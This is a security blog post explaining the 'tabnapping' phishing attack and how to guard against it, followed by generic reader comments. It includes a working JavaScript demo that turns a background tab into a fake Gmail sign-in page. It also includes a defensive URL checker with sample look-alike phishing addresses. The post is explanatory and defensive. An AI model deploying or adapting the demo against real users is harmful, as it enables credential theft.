Beware “Tabnapping” – a new kind of Phishing scam
Aza Raskin, creative lead for Mozilla’s Firefox browser and a user-interface specialist, has outlined a new variant of the “phishing” attack which he has christened “Tabnapping” (Raskin’s own spelling is “tabnabbing”).
Traditionally, “Phishing” has relied upon convincing users to click on a link in an email to take them to a fake website such as their bank, credit card issuer or email account. Once the user logs in to the fake site, their details are transmitted to the fraudster and the account is immediately compromised. Public awareness of “phishing” emails is now relatively high and most people know not to click on links in emails appearing to come from such organisations.
“Tabnapping” relies on the user’s assumption that the content of a tab cannot change while they are not looking at it. You click a link on Twitter or Facebook, or a “sponsored link” in Google, and it loads a genuine-looking page that delivers exactly what it promised. If you then switch to another tab, the page you left behind uses JavaScript to notice that it has lost focus, waits a while, and rewrites itself in place: title, favicon and page body are replaced with a fake log-in page impersonating one of the sites you visit most often, be that Facebook, Gmail, Hotmail or your online bank. The address in the location bar does not change, but nobody re-reads the address of a tab they believe they opened themselves. When you scan back along your tab strip you see what looks like a site you left open, assume you have been logged out, and log in again.
“memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs,” said Raskin, explaining how the scam works.
(Video: “A New Type of Phishing Attack” by Aza Raskin, on Vimeo.)
The biggest danger of this type of attack is that it can be targeted at the websites you actually visit, or even at the ones where you currently have a session open. Traditional “phishing” emails often stumble at the first hurdle by impersonating organisations or banks you have never dealt with: if you don’t bank with HSBC, for example, you know instantly that an HSBC email is a scam. A “Tabnapping” page can instead pick its disguise to fit you, for example by probing your browser history (Raskin’s post refers to a CSS :visited history-sniffing trick, which browsers have since restricted) to confirm that you really use the site it is about to impersonate.
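The mechanism described above, as an added example written for this page (it is not Aza Raskin’s demo code). The timing logic is kept free of DOM calls so it can be run and tested outside a browser; the part that rewrites the page only runs when a `document` exists. The 5-second delay, the “Gmail” target, the icon path and the placeholder form are all assumptions; no credentials are collected.

```javascript
// Demonstration of the tabnapping mechanism. Added example, not Raskin's code.
// Assumptions: 5 s delay before the swap, "Gmail" as the impersonated site,
// and a hypothetical favicon path. The fake form submits nowhere.

// State machine for one tab: idle until the tab loses focus, "swapped" once it
// has stayed hidden for at least `delayMs`. Coming back before the delay
// expires resets the timer, so a quick flick between tabs does not trigger it.
function createTabnabber({ delayMs = 5000 } = {}) {
  let hiddenSince = null; // time the tab lost focus, or null while visible
  let swapped = false;

  // Evaluate the timer; returns true once the swap is due (and stays true).
  function tick(now) {
    if (!swapped && hiddenSince !== null && now - hiddenSince >= delayMs) {
      swapped = true;
    }
    return swapped;
  }
  // Tab lost focus (blur / visibilitychange with document.hidden === true).
  function onHidden(now) {
    if (hiddenSince === null) hiddenSince = now;
    return swapped;
  }
  // Tab regained focus: decide whether the swap is due, then clear the timer.
  function onVisible(now) {
    const due = tick(now);
    hiddenSince = null;
    return due;
  }
  return { tick, onHidden, onVisible, isSwapped: () => swapped };
}

// What the attacker replaces the tab with: title, favicon and body are all
// changed so the tab strip looks like the impersonated site. Placeholder
// values only (constructed for this example).
function fakeLoginPage(target) {
  return {
    title: `${target} - Sign in`,
    favicon: `/icons/${target.toLowerCase()}.ico`, // hypothetical path
    html:
      `<h1>${target}</h1><p>Your session has expired. Please sign in again.</p>` +
      `<form onsubmit="return false"><input name="user" placeholder="Email">` +
      `<input name="pass" type="password" placeholder="Password">` +
      `<button>Sign in</button></form>`,
  };
}

// Browser-only wiring: note when the tab is hidden, poll the timer so the swap
// lands while the user is still looking at another tab, then rewrite title,
// favicon and body in place. The URL in the address bar does not change, which
// is why the advice further down is to check it before logging in.
if (typeof document !== 'undefined') {
  const nabber = createTabnabber({ delayMs: 5000 });
  let applied = false;
  const applySwap = () => {
    if (applied) return;
    applied = true;
    const fake = fakeLoginPage('Gmail');
    document.title = fake.title;
    let icon = document.querySelector('link[rel~="icon"]');
    if (!icon) {
      icon = document.createElement('link');
      icon.rel = 'icon';
      document.head.appendChild(icon);
    }
    icon.href = fake.favicon;
    document.body.innerHTML = fake.html;
  };
  document.addEventListener('visibilitychange', () => {
    if (document.hidden) nabber.onHidden(Date.now());
    else if (nabber.onVisible(Date.now())) applySwap();
  });
  setInterval(() => { if (nabber.tick(Date.now())) applySwap(); }, 500);
}
```

Loaded into an otherwise innocent page, the script does nothing until the tab has been in the background for the delay, which is the whole point: by the time the user returns, the tab looks like something they opened earlier.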
So, how can we avoid this type of “phishing” attack?
Whenever you log in to a website, regardless of whether the tab was already open, check the URL in the address bar to make sure you are still on the genuine site. Look for https:// at the start of the address and the padlock icon the browser shows beside it, but above all read the domain name itself: the padlock only tells you the connection is encrypted, not who is on the other end, and a tabnapping page can be served over https just as easily as any other. If the URL doesn’t look right, or there is no padlock, close the tab, open a new one and type the address yourself.
Better still, make it a policy not to leave websites that require a secure login open in background tabs: log out and close the tab when you are done. That way, if a site that wants you to log in appears in a tab, you know you didn’t leave it there and that you have been “Tabnapped”.
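The address-bar check above, turned into code that a browser extension or a training demo could run. This is an added example, not part of the original post; `expectedHost` stands for a domain you know you log in to (the assumption is that you keep such a list, as a password manager does), and the sample addresses are constructed to show the usual ways a phishing address tries to pass as the real thing.

```javascript
// The "check the address bar before you log in" rule as code. Added example,
// not part of the original post. `expectedHost` is the domain you know you log
// in to (assumption: you keep such a list, as a password manager does).
// Returns { ok, reason } so a caller can show the reason to the user.
function checkLoginUrl(rawUrl, expectedHost) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch (e) {
    return { ok: false, reason: 'address is not a valid URL' };
  }
  if (url.protocol !== 'https:') {
    return { ok: false, reason: `scheme is ${url.protocol} not https:` };
  }
  // https://accounts.example.com@evil.example/ : everything before "@" is
  // user-info, not the host, but it is what a hurried glance reads first.
  if (url.username !== '' || url.password !== '') {
    return { ok: false, reason: `user-info before "@"; real host is ${url.hostname}` };
  }
  const host = url.hostname.toLowerCase();
  const expected = expectedHost.toLowerCase();
  // Internationalised names are normalised to punycode by the URL parser; a
  // look-alike built from Cyrillic letters shows up here as an "xn--" label.
  if (host.split('.').some((label) => label.startsWith('xn--'))) {
    return { ok: false, reason: `host ${host} is an internationalised name; compare it character by character` };
  }
  // Accept the host itself or a subdomain of it. "accounts.google.com.evil.example"
  // ends with ".example", not ".google.com", so it is rejected.
  if (host !== expected && !host.endsWith('.' + expected)) {
    return { ok: false, reason: `host ${host} is not ${expected}` };
  }
  return { ok: true, reason: `https and host ${host} matches ${expected}` };
}

// Constructed sample addresses: one genuine, the rest the usual disguises.
const sampleAddresses = [
  'https://accounts.google.com/signin',               // genuine
  'http://accounts.google.com/signin',                // right host, no https
  'https://accounts.google.com.evil.example/signin',  // real host is evil.example
  'https://accounts.google.com@evil.example/signin',  // user-info trick
  'https://accounts-google.com/signin',               // hyphen instead of dot
  'https://xn--80ak6aa92e.com/signin',                // punycode look-alike
];

// Run the check over a list and keep the verdict next to each address.
function auditAddresses(addresses, expectedHost) {
  return addresses.map((a) => ({ url: a, ...checkLoginUrl(a, expectedHost) }));
}
```

Only the first sample passes. A password manager applies the same host comparison automatically and will not fill credentials on a page whose domain differs from the one they were saved for, which makes it a useful second line of defence against a swapped tab.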




This is such a great resource that you are providing and you give it away for free. I enjoy seeing websites that understand the value of providing a prime resource for free. I truly loved reading your post. Thanks! Brighton Flats Rent Team!
Hey dude, Steve here. Keep ’em coming, you do a fantastic job with this blog, inspiring many newbies like me. Can’t let you know how much I appreciate whatever you do! Steve
I love your content. Thank you.
This is a good website! I just recently found it and now it’s on my Favorites.
thanks and keep tight lines.
Great stuff from you, man. I’ve read your stuff before and you’re just too awesome. I love what you’ve got here, love what you’re saying and exactly how you say it. You make it entertaining and you still manage to ensure that it stays smart. I can’t wait to read more from you. This is really a great blog.
I have to say that I’m really unimpressed with this. I mean, sure, you’ve got some very interesting points. But this blog is just really lacking in something. Maybe it’s content, maybe it’s just the design. I don’t know. But it’s almost like you wrote this because everybody’s doing it. No passion at all.